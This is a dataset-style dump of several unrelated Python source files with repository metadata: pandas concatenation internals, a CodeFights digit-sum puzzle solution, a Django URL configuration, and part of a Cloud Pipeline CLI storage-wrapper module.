        zipped = compat.lzip(*keys)
        if names is None:
            names = [None] * len(zipped)
        if levels is None:
            _, levels = _factorize_from_iterables(zipped)
        else:
            levels = [ensure_index(x) for x in levels]
    else:
        zipped = [keys]
        if names is None:
            names = [None]
        if levels is None:
            levels = [ensure_index(keys)]
        else:
            levels = [ensure_index(x) for x in levels]
    # Slow path: the objects' indexes differ, so per-key codes must be
    # computed explicitly for every level.
    if not _all_indexes_same(indexes):
        codes_list = []
        # things are potentially different sizes, so compute the exact codes
        # for each level and pass those to MultiIndex.from_arrays
        for hlevel, level in zip(zipped, levels):
            to_concat = []
            for key, index in zip(hlevel, indexes):
                try:
                    i = level.get_loc(key)
                except KeyError:
                    raise ValueError('Key {key!s} not in level {level!s}'
                                     .format(key=key, level=level))
                to_concat.append(np.repeat(i, len(index)))
            codes_list.append(np.concatenate(to_concat))
        concat_index = _concat_indexes(indexes)
        # these go at the end
        if isinstance(concat_index, MultiIndex):
            levels.extend(concat_index.levels)
            codes_list.extend(concat_index.codes)
        else:
            codes, categories = _factorize_from_iterable(concat_index)
            levels.append(categories)
            codes_list.append(codes)
        if len(names) == len(levels):
            names = list(names)
        else:
            # make sure that all of the passed indices have the same nlevels
            if not len({idx.nlevels for idx in indexes}) == 1:
                raise AssertionError("Cannot concat indices that do"
                                     " not have the same number of levels")
            # also copies
            names = names + _get_consensus_names(indexes)
        return MultiIndex(levels=levels, codes=codes_list, names=names,
                          verify_integrity=False)
    # Fast path: all indexes are identical, so codes can be built with
    # repeat/tile instead of per-key lookups.
    new_index = indexes[0]
    n = len(new_index)
    kpieces = len(indexes)
    # also copies
    new_names = list(names)
    new_levels = list(levels)
    # construct codes
    new_codes = []
    # do something a bit more speedy
    for hlevel, level in zip(zipped, levels):
        hlevel = ensure_index(hlevel)
        mapped = level.get_indexer(hlevel)
        mask = mapped == -1
        if mask.any():
            raise ValueError('Values not found in passed level: {hlevel!s}'
                             .format(hlevel=hlevel[mask]))
        new_codes.append(np.repeat(mapped, n))
    if isinstance(new_index, MultiIndex):
        new_levels.extend(new_index.levels)
        new_codes.extend([np.tile(lab, kpieces) for lab in new_index.codes])
    else:
        new_levels.append(new_index)
        new_codes.append(np.tile(np.arange(n), kpieces))
    if len(new_names) < len(new_levels):
        new_names.extend(new_index.names)
    return MultiIndex(levels=new_levels, codes=new_codes, names=new_names,
                      verify_integrity=False)
| 35 | 79 | 0.545058 |
import numpy as np
import pandas.core.dtypes.concat as _concat
from pandas import DataFrame, Index, MultiIndex, Series, compat
from pandas.core import common as com
from pandas.core.arrays.categorical import (
_factorize_from_iterable, _factorize_from_iterables)
from pandas.core.generic import NDFrame
from pandas.core.index import (
_all_indexes_same, _get_consensus_names, _get_objs_combined_axis,
ensure_index)
import pandas.core.indexes.base as ibase
from pandas.core.internals import concatenate_block_managers
def concat(objs, axis=0, join='outer', join_axes=None, ignore_index=False,
keys=None, levels=None, names=None, verify_integrity=False,
sort=None, copy=True):
op = _Concatenator(objs, axis=axis, join_axes=join_axes,
ignore_index=ignore_index, join=join,
keys=keys, levels=levels, names=names,
verify_integrity=verify_integrity,
copy=copy, sort=sort)
return op.get_result()
class _Concatenator(object):
def __init__(self, objs, axis=0, join='outer', join_axes=None,
keys=None, levels=None, names=None,
ignore_index=False, verify_integrity=False, copy=True,
sort=False):
if isinstance(objs, (NDFrame, str)):
raise TypeError('first argument must be an iterable of pandas '
'objects, you passed an object of type '
'"{name}"'.format(name=type(objs).__name__))
if join == 'outer':
self.intersect = False
elif join == 'inner':
self.intersect = True
else:
raise ValueError('Only can inner (intersect) or outer (union) '
'join the other axis')
if isinstance(objs, dict):
if keys is None:
keys = com.dict_keys_to_ordered_list(objs)
objs = [objs[k] for k in keys]
else:
objs = list(objs)
if len(objs) == 0:
raise ValueError('No objects to concatenate')
if keys is None:
objs = list(com._not_none(*objs))
else:
clean_keys = []
clean_objs = []
for k, v in zip(keys, objs):
if v is None:
continue
clean_keys.append(k)
clean_objs.append(v)
objs = clean_objs
name = getattr(keys, 'name', None)
keys = Index(clean_keys, name=name)
if len(objs) == 0:
raise ValueError('All objects passed were None')
ndims = set()
for obj in objs:
if not isinstance(obj, (Series, DataFrame)):
msg = ("cannot concatenate object of type '{}';"
' only Series and DataFrame objs are valid'
.format(type(obj)))
raise TypeError(msg)
obj._consolidate(inplace=True)
ndims.add(obj.ndim)
sample = None
if len(ndims) > 1:
max_ndim = max(ndims)
for obj in objs:
if obj.ndim == max_ndim and np.sum(obj.shape):
sample = obj
break
else:
non_empties = [obj for obj in objs
if sum(obj.shape) > 0 or isinstance(obj, Series)]
if (len(non_empties) and (keys is None and names is None and
levels is None and
join_axes is None and
not self.intersect)):
objs = non_empties
sample = objs[0]
if sample is None:
sample = objs[0]
self.objs = objs
if isinstance(sample, Series):
axis = DataFrame._get_axis_number(axis)
else:
axis = sample._get_axis_number(axis)
self._is_frame = isinstance(sample, DataFrame)
if self._is_frame:
axis = 1 if axis == 0 else 0
self._is_series = isinstance(sample, Series)
if not 0 <= axis <= sample.ndim:
raise AssertionError("axis must be between 0 and {ndim}, input was"
" {axis}".format(ndim=sample.ndim, axis=axis))
if len(ndims) > 1:
current_column = 0
max_ndim = sample.ndim
self.objs, objs = [], self.objs
for obj in objs:
ndim = obj.ndim
if ndim == max_ndim:
pass
elif ndim != max_ndim - 1:
raise ValueError("cannot concatenate unaligned mixed "
"dimensional NDFrame objects")
else:
name = getattr(obj, 'name', None)
if ignore_index or name is None:
name = current_column
current_column += 1
if self._is_frame and axis == 1:
name = 0
obj = sample._constructor({name: obj})
self.objs.append(obj)
self.axis = axis
self.join_axes = join_axes
self.keys = keys
self.names = names or getattr(keys, 'names', None)
self.levels = levels
self.sort = sort
self.ignore_index = ignore_index
self.verify_integrity = verify_integrity
self.copy = copy
self.new_axes = self._get_new_axes()
def get_result(self):
if self._is_series:
if self.axis == 0:
name = com.consensus_name_attr(self.objs)
mgr = self.objs[0]._data.concat([x._data for x in self.objs],
self.new_axes)
cons = _concat._get_series_result_type(mgr, self.objs)
return cons(mgr, name=name).__finalize__(self, method='concat')
else:
data = dict(zip(range(len(self.objs)), self.objs))
cons = _concat._get_series_result_type(data)
index, columns = self.new_axes
df = cons(data, index=index)
df.columns = columns
return df.__finalize__(self, method='concat')
else:
mgrs_indexers = []
for obj in self.objs:
mgr = obj._data
indexers = {}
for ax, new_labels in enumerate(self.new_axes):
if ax == self.axis:
continue
obj_labels = mgr.axes[ax]
if not new_labels.equals(obj_labels):
indexers[ax] = obj_labels.reindex(new_labels)[1]
mgrs_indexers.append((obj._data, indexers))
new_data = concatenate_block_managers(
mgrs_indexers, self.new_axes, concat_axis=self.axis,
copy=self.copy)
if not self.copy:
new_data._consolidate_inplace()
cons = _concat._get_frame_result_type(new_data, self.objs)
return (cons._from_axes(new_data, self.new_axes)
.__finalize__(self, method='concat'))
def _get_result_dim(self):
if self._is_series and self.axis == 1:
return 2
else:
return self.objs[0].ndim
def _get_new_axes(self):
ndim = self._get_result_dim()
new_axes = [None] * ndim
if self.join_axes is None:
for i in range(ndim):
if i == self.axis:
continue
new_axes[i] = self._get_comb_axis(i)
else:
if len(self.join_axes) != ndim - 1:
raise AssertionError("length of join_axes must be equal "
"to {length}".format(length=ndim - 1))
indices = compat.lrange(ndim)
indices.remove(self.axis)
for i, ax in zip(indices, self.join_axes):
new_axes[i] = ax
new_axes[self.axis] = self._get_concat_axis()
return new_axes
def _get_comb_axis(self, i):
data_axis = self.objs[0]._get_block_manager_axis(i)
try:
return _get_objs_combined_axis(self.objs, axis=data_axis,
intersect=self.intersect,
sort=self.sort)
except IndexError:
types = [type(x).__name__ for x in self.objs]
raise TypeError("Cannot concatenate list of {types}"
.format(types=types))
def _get_concat_axis(self):
if self._is_series:
if self.axis == 0:
indexes = [x.index for x in self.objs]
elif self.ignore_index:
idx = ibase.default_index(len(self.objs))
return idx
elif self.keys is None:
names = [None] * len(self.objs)
num = 0
has_names = False
for i, x in enumerate(self.objs):
if not isinstance(x, Series):
raise TypeError("Cannot concatenate type 'Series' "
"with object of type {type!r}"
.format(type=type(x).__name__))
if x.name is not None:
names[i] = x.name
has_names = True
else:
names[i] = num
num += 1
if has_names:
return Index(names)
else:
return ibase.default_index(len(self.objs))
else:
return ensure_index(self.keys).set_names(self.names)
else:
indexes = [x._data.axes[self.axis] for x in self.objs]
if self.ignore_index:
idx = ibase.default_index(sum(len(i) for i in indexes))
return idx
if self.keys is None:
concat_axis = _concat_indexes(indexes)
else:
concat_axis = _make_concat_multiindex(indexes, self.keys,
self.levels, self.names)
self._maybe_check_integrity(concat_axis)
return concat_axis
def _maybe_check_integrity(self, concat_index):
if self.verify_integrity:
if not concat_index.is_unique:
overlap = concat_index[concat_index.duplicated()].unique()
raise ValueError('Indexes have overlapping values: '
'{overlap!s}'.format(overlap=overlap))
def _concat_indexes(indexes):
return indexes[0].append(indexes[1:])
def _make_concat_multiindex(indexes, keys, levels=None, names=None):
if ((levels is None and isinstance(keys[0], tuple)) or
(levels is not None and len(levels) > 1)):
zipped = compat.lzip(*keys)
if names is None:
names = [None] * len(zipped)
if levels is None:
_, levels = _factorize_from_iterables(zipped)
else:
levels = [ensure_index(x) for x in levels]
else:
zipped = [keys]
if names is None:
names = [None]
if levels is None:
levels = [ensure_index(keys)]
else:
levels = [ensure_index(x) for x in levels]
if not _all_indexes_same(indexes):
codes_list = []
for hlevel, level in zip(zipped, levels):
to_concat = []
for key, index in zip(hlevel, indexes):
try:
i = level.get_loc(key)
except KeyError:
raise ValueError('Key {key!s} not in level {level!s}'
.format(key=key, level=level))
to_concat.append(np.repeat(i, len(index)))
codes_list.append(np.concatenate(to_concat))
concat_index = _concat_indexes(indexes)
if isinstance(concat_index, MultiIndex):
levels.extend(concat_index.levels)
codes_list.extend(concat_index.codes)
else:
codes, categories = _factorize_from_iterable(concat_index)
levels.append(categories)
codes_list.append(codes)
if len(names) == len(levels):
names = list(names)
else:
if not len({idx.nlevels for idx in indexes}) == 1:
raise AssertionError("Cannot concat indices that do"
" not have the same number of levels")
names = names + _get_consensus_names(indexes)
return MultiIndex(levels=levels, codes=codes_list, names=names,
verify_integrity=False)
new_index = indexes[0]
n = len(new_index)
kpieces = len(indexes)
new_names = list(names)
new_levels = list(levels)
new_codes = []
for hlevel, level in zip(zipped, levels):
hlevel = ensure_index(hlevel)
mapped = level.get_indexer(hlevel)
mask = mapped == -1
if mask.any():
raise ValueError('Values not found in passed level: {hlevel!s}'
.format(hlevel=hlevel[mask]))
new_codes.append(np.repeat(mapped, n))
if isinstance(new_index, MultiIndex):
new_levels.extend(new_index.levels)
new_codes.extend([np.tile(lab, kpieces) for lab in new_index.codes])
else:
new_levels.append(new_index)
new_codes.append(np.tile(np.arange(n), kpieces))
if len(new_names) < len(new_levels):
new_names.extend(new_index.names)
return MultiIndex(levels=new_levels, codes=new_codes, names=new_names,
verify_integrity=False)
| true | true |
1c2c9846bb530c6a7db2bfeffeaf52ece44cd30d | 1,050 | py | Python | arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/047_ComfortableNumbers.py | netor27/codefights-arcade-solutions | 69701ab06d45902c79ec9221137f90b75969d8c8 | [
"MIT"
] | null | null | null | arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/047_ComfortableNumbers.py | netor27/codefights-arcade-solutions | 69701ab06d45902c79ec9221137f90b75969d8c8 | [
"MIT"
] | null | null | null | arcade/python/arcade-theCore/06_LabyrinthOfNestedLoops/047_ComfortableNumbers.py | netor27/codefights-arcade-solutions | 69701ab06d45902c79ec9221137f90b75969d8c8 | [
"MIT"
] | null | null | null | def comfortableNumbers(l, r):
'''
Let's say that number a feels comfortable with number b if a ≠ b and b lies in the segment [a - s(a), a + s(a)], where s(x) is the sum of x's digits.
How many pairs (a, b) are there, such that a < b, both a and b lie on the segment [l, r], and each number feels comfortable with the other?
Example
For l = 10 and r = 12, the output should be
comfortableNumbers(l, r) = 2.
Here are all values of s(x) to consider:
s(10) = 1, so 10 is comfortable with 9 and 11;
s(11) = 2, so 11 is comfortable with 9, 10, 12 and 13;
s(12) = 3, so 12 is comfortable with 9, 10, 11, 13, 14 and 15.
Thus, there are 2 pairs of numbers comfortable with each other within the segment [10; 12]: (10, 11) and (11, 12).
'''
result = 0
for a in range(l, r):
sa = sumOfDigits(a)
for b in range(a + 1, min(r + 1, a + sa + 1)):
sb = sumOfDigits(b)
if b - a <= sb:
result += 1
return result
def sumOfDigits(n):
    """Return the sum of the decimal digits of ``n``.

    Generalized to accept negative numbers by ignoring the sign (the
    previous implementation raised ValueError on the '-' character).
    Uses a generator expression instead of building a throwaway list.
    """
    return sum(int(digit) for digit in str(abs(n)))
| 32.8125 | 153 | 0.599048 | def comfortableNumbers(l, r):
result = 0
for a in range(l, r):
sa = sumOfDigits(a)
for b in range(a + 1, min(r + 1, a + sa + 1)):
sb = sumOfDigits(b)
if b - a <= sb:
result += 1
return result
def sumOfDigits(n):
return sum([int(i) for i in str(n)])
| true | true |
1c2c98cf381d25134cbbe5eeac3bcfb00b4e0d3a | 608 | py | Python | rank/urls.py | shvedovskiy/web_technopolis | 430d7e74fb87870e369ca615294116c63a51ff25 | [
"WTFPL"
] | null | null | null | rank/urls.py | shvedovskiy/web_technopolis | 430d7e74fb87870e369ca615294116c63a51ff25 | [
"WTFPL"
] | 1 | 2016-12-02T17:02:23.000Z | 2016-12-02T17:02:23.000Z | rank/urls.py | shvedovskiy/web_technopolis | 430d7e74fb87870e369ca615294116c63a51ff25 | [
"WTFPL"
] | null | null | null | from django.conf.urls import url
from . import views
app_name = 'rank'  # URL namespace: reverse routes as e.g. 'rank:index'
urlpatterns = [
    # Landing page and static informational page.
    url(r'^$', views.index, name='index'),
    url(r'^about/$', views.about, name='about'),
    # Category routes: creation, detail view (addressed by slug) and
    # adding a page within a category.
    url(r'^add_category', views.add_category, name='add_category'),
    url(r'^category/(?P<category_name_slug>[\w\-]+)/$', views.category, name='category'),
    url(r'^category/(?P<category_name_slug>[\w\-]+)/add_page/$', views.add_page, name='add_page'),
    # Authentication: registration, login and logout.
    url(r'^register/$', views.register, name='register'),
    url(r'^login/$', views.user_login, name='login'),
    url(r'^logout/$', views.user_logout, name='logout'),
]
| 40.533333 | 98 | 0.646382 | from django.conf.urls import url
from . import views
app_name = 'rank'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^about/$', views.about, name='about'),
url(r'^add_category', views.add_category, name='add_category'),
url(r'^category/(?P<category_name_slug>[\w\-]+)/$', views.category, name='category'),
url(r'^category/(?P<category_name_slug>[\w\-]+)/add_page/$', views.add_page, name='add_page'),
url(r'^register/$', views.register, name='register'),
url(r'^login/$', views.user_login, name='login'),
url(r'^logout/$', views.user_logout, name='logout'),
]
| true | true |
1c2c99328ec43c52455f8910f49b6adb1e526a0d | 26,618 | py | Python | pipe-cli/src/model/data_storage_wrapper.py | AlfiyaRF/cloud-pipeline | 532c02a7e88928f42b28be87545aab93db404df5 | [
"Apache-2.0"
] | null | null | null | pipe-cli/src/model/data_storage_wrapper.py | AlfiyaRF/cloud-pipeline | 532c02a7e88928f42b28be87545aab93db404df5 | [
"Apache-2.0"
] | null | null | null | pipe-cli/src/model/data_storage_wrapper.py | AlfiyaRF/cloud-pipeline | 532c02a7e88928f42b28be87545aab93db404df5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import abstractmethod, ABCMeta
from ftplib import FTP, error_temp
from future.standard_library import install_aliases
install_aliases()
from urllib.parse import urlparse
import click
import requests
import sys
from ..api.data_storage import DataStorage
from ..config import ConfigNotFoundError
from ..utilities.storage.s3 import S3BucketOperations
from ..utilities.storage.local import LocalOperations
from ..utilities.storage.azure import AzureListingManager, AzureDeleteManager, AzureBucketOperations
from ..utilities.storage.gs import GsRestoreManager, GsListingManager, GsDeleteManager, GsBucketOperations
from ..utilities.storage.common import StorageOperations
from .data_storage_wrapper_type import WrapperType
import shutil
from bs4 import BeautifulSoup, SoupStrainer
import posixpath
# Item type labels; presumably used when reporting storage listing
# results -- confirm at the usage sites (not visible in this chunk).
FILE = 'File'
FOLDER = 'Folder'
class AllowedSymlinkValues(object):
    """Allowed values of the symlink-handling mode for local sources.

    NOTE(review): the exact semantics of each mode are implemented by
    the consumers of these constants (not visible here) -- confirm there.
    """
    FOLLOW = 'follow'
    SKIP = 'skip'
    FILTER = 'filter'
class DataStorageWrapper(object):
    """Base class for transfer source/destination path wrappers.

    A wrapper adapts one location kind (cloud bucket, local file system,
    FTP or HTTP source) to the common interface used by the transfer
    commands: existence/type checks, item listing, download and delete.
    """

    # Maps a (source type, destination type) pair to the factory that builds
    # the transfer manager able to move data between those two location kinds.
    _transfer_manager_suppliers = {
        (WrapperType.S3, WrapperType.S3): S3BucketOperations.get_transfer_between_buckets_manager,
        (WrapperType.S3, WrapperType.LOCAL): S3BucketOperations.get_download_manager,
        (WrapperType.LOCAL, WrapperType.S3): S3BucketOperations.get_upload_manager,
        (WrapperType.FTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.S3): S3BucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.AZURE, WrapperType.AZURE): AzureBucketOperations.get_transfer_between_buckets_manager,
        (WrapperType.AZURE, WrapperType.LOCAL): AzureBucketOperations.get_download_manager,
        (WrapperType.LOCAL, WrapperType.AZURE): AzureBucketOperations.get_upload_manager,
        (WrapperType.FTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.AZURE): AzureBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.GS, WrapperType.GS): GsBucketOperations.get_transfer_between_buckets_manager,
        (WrapperType.GS, WrapperType.LOCAL): GsBucketOperations.get_download_manager,
        (WrapperType.LOCAL, WrapperType.GS): GsBucketOperations.get_upload_manager,
        (WrapperType.FTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.GS): GsBucketOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.FTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager,
        (WrapperType.HTTP, WrapperType.LOCAL): LocalOperations.get_transfer_from_http_or_ftp_manager
    }

    def __init__(self, path):
        self.path = path
        self.items = []  # cached listing, filled by fetch_items()
        self.path_separator = StorageOperations.PATH_SEPARATOR

    @classmethod
    def get_wrapper(cls, uri, symlinks=None):
        """Return the wrapper matching *uri*'s scheme.

        Schemeless URIs map to the local file system.  ftp(s) URIs are served
        over HTTP when the ftp_proxy environment variable is set, otherwise
        via a direct FTP connection.  http(s) URIs get an HTTP wrapper; any
        other scheme is assumed to be a cloud storage URI.
        """
        parsed = urlparse(uri)
        if not parsed.scheme or not parsed.netloc:
            return LocalFileSystemWrapper(uri, symlinks)
        if parsed.scheme.lower() == 'ftp' or parsed.scheme.lower() == 'ftps':
            return HttpSourceWrapper(uri) if os.getenv("ftp_proxy") \
                else FtpSourceWrapper(parsed.scheme, parsed.netloc, parsed.path, uri)
        if parsed.scheme.lower() == 'http' or parsed.scheme.lower() == 'https':
            return HttpSourceWrapper(uri)
        else:
            return cls.get_cloud_wrapper(uri)

    @classmethod
    def get_cloud_wrapper(cls, uri, versioning=False):
        """Resolve *uri* via the API and build the matching bucket wrapper."""
        root_bucket, original_path, _ = DataStorage.load_from_uri(uri)
        relative_path = original_path if original_path != '/' else ''
        return cls.__get_storage_wrapper(root_bucket, relative_path, versioning=versioning)

    @classmethod
    def get_cloud_wrapper_for_bucket(cls, bucket_model, relative_path):
        """Build a bucket wrapper from an already-resolved model (no init call)."""
        return cls.__get_storage_wrapper(bucket_model, relative_path, init=False)

    @classmethod
    def __get_storage_wrapper(cls, bucket, relative_path, *args, **kwargs):
        """Dispatch to the provider-specific wrapper factory by bucket type."""
        _suppliers = {
            WrapperType.S3: S3BucketWrapper.build_wrapper,
            WrapperType.AZURE: AzureBucketWrapper.build_wrapper,
            WrapperType.GS: GsBucketWrapper.build_wrapper,
        }
        if bucket.type in _suppliers:
            supplier = _suppliers[bucket.type]
            return supplier(bucket, relative_path, *args, **kwargs)
        else:
            raise RuntimeError('There is no data storage wrapper for %s storage type.' % bucket.type)

    @classmethod
    def get_operation_manager(cls, source_wrapper, destination_wrapper, command):
        """Return the transfer manager for the (source, destination) type pair."""
        manager_types = source_wrapper.get_type(), destination_wrapper.get_type()
        if manager_types in DataStorageWrapper._transfer_manager_suppliers:
            supplier = DataStorageWrapper._transfer_manager_suppliers[manager_types]
            return supplier(source_wrapper, destination_wrapper, command)
        else:
            raise RuntimeError('Transferring files between the following storage types %s -> %s is not supported.'
                               % manager_types)

    @classmethod
    def get_data_storage_item_path_info(cls, path, buckets=None):
        """Resolve *path* to (error, bucket id, relative path, item type, delimiter).

        NOTE(review): the error returns below carry 4 elements while the
        success return carries 5 — confirm that callers unpack accordingly.
        """
        error = None
        if buckets is None or len(buckets) == 0:
            buckets = []
            try:
                buckets = list(DataStorage.list())
            except ConfigNotFoundError as config_not_found_error:
                error = str(config_not_found_error)
            except requests.exceptions.RequestException as http_error:
                error = 'Http error: {}'.format(str(http_error))
            except RuntimeError as runtime_error:
                error = 'Error: {}'.format(str(runtime_error))
            except ValueError as value_error:
                error = 'Error: {}'.format(str(value_error))
        if error:
            return error, None, None, None
        url = urlparse(path)
        if url.scheme.lower() not in WrapperType.cloud_schemes():
            return "'%s' scheme is not supported" % url.scheme, None, None, None
        parts = url.path.split('/')
        current_bucket = None
        for bucket_model in buckets:
            # NOTE(review): the original-case *path* is tested against the
            # lowercased bucket path, and the loop breaks on the first match,
            # which makes the longest-prefix comparison below ineffective —
            # confirm intent before changing.
            if bucket_model.path is not None \
                    and bucket_model.type in WrapperType.cloud_types() \
                    and path.startswith(bucket_model.path.lower()):
                if current_bucket is None or len(bucket_model.path) > len(current_bucket.path):
                    current_bucket = bucket_model
                break
        if current_bucket is None:
            return 'Storage \'{}\' was not found'.format(path), None, None, None
        delimiter = '/'
        if current_bucket.delimiter is not None:
            delimiter = current_bucket.delimiter
        relative_path = url.path
        item_type = FILE
        # Heuristic: a last path segment without a '.' is treated as a folder.
        if len(parts[len(parts) - 1].split('.')) == 1:
            item_type = FOLDER
        return None, current_bucket.identifier, relative_path, item_type, delimiter

    def get_type(self):
        # Subclasses return their WrapperType constant; the base has none.
        return None

    def is_file(self):
        return False

    def exists(self):
        return False

    def is_empty(self, relative=None):
        return False

    def is_local(self):
        return self.get_type() == WrapperType.LOCAL

    def fetch_items(self):
        # Cache the listing for later get_folders_list/get_files_list calls.
        self.items = self.get_items()

    def get_items(self):
        # Subclasses return (type, full path, relative path, size) tuples.
        return []

    def get_folders_list(self):
        """(full path, relative path) pairs for cached FOLDER items."""
        return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FOLDER])

    def get_files_list(self):
        """(full path, relative path) pairs for cached FILE items."""
        return map(lambda i: (i[1], i[2]), [item for item in self.items if item[0] == FILE])

    def create_folder(self, relative_path):
        pass

    def download_file(self, source_uri, relative_path):
        pass

    def download_single_file(self, source_uri, relative_path):
        pass

    def get_file_download_uri(self, relative_path):
        return None

    def delete_item(self, relative_path):
        pass

    def path_with_trailing_separator(self):
        """Return the wrapped path guaranteed to end with this wrapper's separator."""
        return self.path \
            if self.path.endswith(self.path_separator) \
            else self.path + self.path_separator
class CloudDataStorageWrapper(DataStorageWrapper):
    """Common base for cloud bucket wrappers (S3, Azure, GS).

    Subclasses supply the provider-specific listing/restore/delete managers.
    """
    # Python 2 style metaclass declaration (ignored on Python 3).
    __metaclass__ = ABCMeta

    def __init__(self, bucket, path):
        super(CloudDataStorageWrapper, self).__init__(path)
        self.bucket = bucket  # bucket model for this storage
        self.is_file_flag = False
        self.exists_flag = False
        # case when the root bucket folder is passed
        if len(path) == 0 and self.bucket.identifier:
            self.exists_flag = True
            self.is_file_flag = False

    def is_file(self):
        return self.is_file_flag

    def exists(self):
        return self.exists_flag

    def get_items(self):
        return self.get_list_manager().get_items(self.path)

    def is_empty(self, relative=None):
        """True when the path is absent, or names no existing folder in the bucket."""
        if not self.exists():
            return True
        if self.is_file():
            return False
        if relative:
            delimiter = StorageOperations.PATH_SEPARATOR
            path = self.path.rstrip(delimiter) + delimiter + relative
        else:
            path = self.path
        return not self.get_list_manager().folder_exists(path)

    @abstractmethod
    def get_type(self):
        # Provider-specific WrapperType constant.
        pass

    @abstractmethod
    def get_restore_manager(self):
        # Manager able to restore versioned items (where supported).
        pass

    @abstractmethod
    def get_list_manager(self, show_versions=False):
        # Manager able to list bucket contents.
        pass

    @abstractmethod
    def get_delete_manager(self, versioning):
        # Manager able to delete bucket contents.
        pass
class S3BucketWrapper(CloudDataStorageWrapper):
    """Wrapper for AWS S3 bucket paths; delegates to S3BucketOperations."""

    def __init__(self, bucket, path):
        super(S3BucketWrapper, self).__init__(bucket, path)
        # parse root bucket from path
        self.bucket.path = bucket.path.split(self.path_separator)[0]
        self.is_empty_flag = True
        # presumably assigned by S3BucketOperations.init_wrapper — verify.
        self.session = None

    @classmethod
    def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
        """Construct the wrapper; when init=True, initialize it against S3."""
        wrapper = S3BucketWrapper(root_bucket, relative_path)
        if init:
            S3BucketOperations.init_wrapper(wrapper, *args, **kwargs)
        return wrapper

    def get_type(self):
        return WrapperType.S3

    def is_empty(self, relative=None):
        """Like the base check, but uses the state captured at init time."""
        if not self.exists():
            return True
        if self.is_file():
            return False
        if not self.is_empty_flag and relative:
            return not S3BucketOperations.path_exists(self, relative, session=self.session)
        return self.is_empty_flag

    def get_file_download_uri(self, relative_path):
        """Return a generated download URL for the item, or None."""
        download_url_model = DataStorage.generate_download_url(self.bucket.identifier, relative_path)
        if download_url_model is not None:
            return download_url_model.url
        return None

    def delete_item(self, relative_path):
        S3BucketOperations.delete_item(self, relative_path, session=self.session)

    def get_restore_manager(self):
        return S3BucketOperations.get_restore_manager(self)

    def get_list_manager(self, show_versions=False):
        return S3BucketOperations.get_list_manager(self, show_versions=show_versions)

    def get_delete_manager(self, versioning):
        return S3BucketOperations.get_delete_manager(self, versioning)
class AzureBucketWrapper(CloudDataStorageWrapper):
    """Wrapper for Azure blob storage paths (versioning is not supported)."""

    def __init__(self, bucket, path):
        super(AzureBucketWrapper, self).__init__(bucket, path)
        self.service = None  # lazily-built blob service client, see _blob_service()

    @classmethod
    def build_wrapper(cls, root_bucket, relative_path, versioning=False, init=True):
        """Construct the wrapper; Azure rejects any versioning request."""
        if versioning:
            raise RuntimeError('Versioning is not supported by AZURE cloud provider')
        wrapper = AzureBucketWrapper(root_bucket, relative_path)
        if init:
            StorageOperations.init_wrapper(wrapper, versioning=versioning)
        return wrapper

    def get_type(self):
        return WrapperType.AZURE

    def get_restore_manager(self):
        raise RuntimeError('Versioning is not supported by AZURE cloud provider')

    def get_list_manager(self, show_versions=False):
        if show_versions:
            raise RuntimeError('Versioning is not supported by AZURE cloud provider')
        return AzureListingManager(self._blob_service(read=True, write=False), self.bucket)

    def get_delete_manager(self, versioning):
        if versioning:
            raise RuntimeError('Versioning is not supported by AZURE cloud provider')
        return AzureDeleteManager(self._blob_service(read=True, write=True), self.bucket)

    def _blob_service(self, read, write):
        # A write-capable service is always rebuilt; a read-only one is cached.
        if write or not self.service:
            self.service = AzureBucketOperations.get_blob_service(self.bucket, read, write)
        return self.service
class GsBucketWrapper(CloudDataStorageWrapper):
    """Wrapper for Google Cloud Storage bucket paths."""

    @classmethod
    def build_wrapper(cls, root_bucket, relative_path, init=True, *args, **kwargs):
        """Construct the wrapper and, unless init is False, initialize it."""
        wrapper = GsBucketWrapper(root_bucket, relative_path)
        if init:
            StorageOperations.init_wrapper(wrapper, *args, **kwargs)
        return wrapper

    def get_type(self):
        return WrapperType.GS

    def get_restore_manager(self):
        client = self._storage_client(write=True, versioning=True)
        return GsRestoreManager(client, self)

    def get_list_manager(self, show_versions=False):
        client = self._storage_client(versioning=show_versions)
        return GsListingManager(client, self.bucket, show_versions)

    def get_delete_manager(self, versioning):
        client = self._storage_client(write=True, versioning=versioning)
        return GsDeleteManager(client, self.bucket)

    def _storage_client(self, read=True, write=False, versioning=False):
        # Delegate client construction to the shared GS operations helper.
        return GsBucketOperations.get_client(self.bucket, read=read, write=write, versioning=versioning)
class LocalFileSystemWrapper(DataStorageWrapper):
    """Wrapper over a path on the local file system."""

    def __init__(self, path, symlinks=None):
        super(LocalFileSystemWrapper, self).__init__(path)
        if self.path == ".":
            self.path = "./"
        if self.path.startswith("~"):
            # Expand a leading '~' against the user's home directory.
            # Fix: the previous self.path.strip("~/") also removed *trailing*
            # slashes (turning '~/dir/' into '<home>/dir'); strip only the
            # leading '~' and '/' characters instead.
            self.path = os.path.join(os.path.expanduser('~'), self.path.lstrip("~").lstrip("/"))
        self.symlinks = symlinks
        self.path_separator = os.sep

    def exists(self):
        return os.path.exists(self.path)

    def is_file(self):
        return os.path.isfile(self.path)

    def get_type(self):
        return WrapperType.LOCAL

    def is_empty(self, relative=None):
        """Return True when the path is missing or is an empty directory."""
        if not self.exists():
            return True
        if self.is_file():
            return False
        if relative:
            return not os.path.exists(os.path.join(self.path, relative))
        return not os.listdir(self.path)

